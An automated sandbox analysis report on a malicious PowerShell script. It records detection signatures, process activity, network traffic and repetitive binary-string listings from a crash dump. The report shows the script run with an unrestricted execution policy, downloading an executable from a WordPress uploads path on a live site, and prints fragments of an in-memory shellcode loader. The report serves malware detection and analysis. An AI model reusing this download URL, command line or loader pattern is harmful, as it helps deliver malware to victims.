Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
untrippingvT.ps1

Overview

General Information

Sample name:untrippingvT.ps1
Analysis ID:1567193
MD5:e526026cb74a39fc4b0a27aae4f49bd7
SHA1:b368b77e815996a1fbe4e2917fec0d833bc27d79
SHA256:8f63ece1f34da011c8aaddba57b7955e681df41750b17eafaa35d9765d1e0be9
Tags:ps1www-italialife24-ituser-JAMESWT_MHT
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 7648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\untrippingvT.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 7976 cmdline: C:\Windows\system32\WerFault.exe -u -p 7648 -s 1976 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\untrippingvT.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\untrippingvT.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7956, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\untrippingvT.ps1", ProcessId: 7648, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\untrippingvT.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\untrippingvT.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7956, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\untrippingvT.ps1", ProcessId: 7648, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-03T09:17:02.324744+010020216971A Network Trojan was detected192.168.2.94971246.254.34.201443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: untrippingvT.ps1Avira: detected
Source: untrippingvT.ps1ReversingLabs: Detection: 26%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.5% probability
Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.9:49712 version: TLS 1.2
Source: Binary string: System.Configuration.Install.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Configuration.pdbP<> source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Data.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Core.pdb`- source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb8 source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Core.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Numerics.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Configuration.Install.pdbpS) source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: mscorlib.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: mscorlib.pdbL source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Xml.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.ni.pdbRSDS source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.DirectoryServices.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.pdbh source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Configuration.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Data.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Configuration.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Xml.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Data.pdbH source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Management.Automation.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: mscorlib.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Management.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Management.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Core.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Transactions.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Transactions.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Numerics.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERF8E5.tmp.dmp.5.dr
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2021697 - Severity 1 - ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious : 192.168.2.9:49712 -> 46.254.34.201:443
Source: Joe Sandbox ViewIP Address: 46.254.34.201 46.254.34.201
Source: Joe Sandbox ViewASN Name: SERVERPLAN-ASIT SERVERPLAN-ASIT
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/hypervitalizationVA.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/hypervitalizationVA.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: www.italialife24.it
Source: powershell.exe, 00000000.00000002.1520434091.000001F9E5C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CEE5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://italialife24.it
Source: powershell.exe, 00000000.00000002.1514275435.000001F9DD823000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1496224082.000001F9CF16D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CD9D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CD7B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CEE96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CD9D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CEE5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.italialife24.it
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CD7B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CF16D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CF16D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CF16D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CD9D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CE2FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1514275435.000001F9DD823000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1496224082.000001F9CF16D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CEE96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CEE96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CECFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1496224082.000001F9CD9D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it
Source: powershell.exe, 00000000.00000002.1496224082.000001F9CD9D9000.00000004.00000800.00020000.00000000.sdmp, untrippingvT.ps1String found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/hypervitalizationVA.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.9:49712 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7648 -s 1976
Source: classification engineClassification label: mal72.evad.winPS1@3/9@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7648
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25ooazca.h2o.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: untrippingvT.ps1ReversingLabs: Detection: 26%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\untrippingvT.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7648 -s 1976
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Configuration.Install.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Configuration.pdbP<> source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Data.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Core.pdb`- source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb8 source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Core.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Numerics.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Configuration.Install.pdbpS) source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: mscorlib.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: mscorlib.pdbL source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Xml.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.ni.pdbRSDS source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.DirectoryServices.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.pdbh source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Configuration.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Data.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Configuration.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Xml.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Data.pdbH source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Management.Automation.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: mscorlib.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Management.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Management.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Core.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Transactions.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Transactions.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Numerics.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.ni.pdb source: WERF8E5.tmp.dmp.5.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERF8E5.tmp.dmp.5.dr

Data Obfuscation

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($VAAddr, $VADeleg)$CTAddr = GPA kernel32.dll CreateThread$CTDeleg = GDT @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])$CT = $marshal::GetDelegat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly($DA, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $MB = $AB.DefineDynamicModule('IMM', $false) $TB = $MB.DefineType('MDT', 'Class, Public, Sealed, AnsiClass, AutoCl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887D36FD5 push ecx; iretd 0_2_00007FF887D36FDC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887D343A5 push edi; iretd 0_2_00007FF887D343A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887D39382 push esp; retf 0_2_00007FF887D39383
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887D3AAF2 push eax; ret 0_2_00007FF887D3AB29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
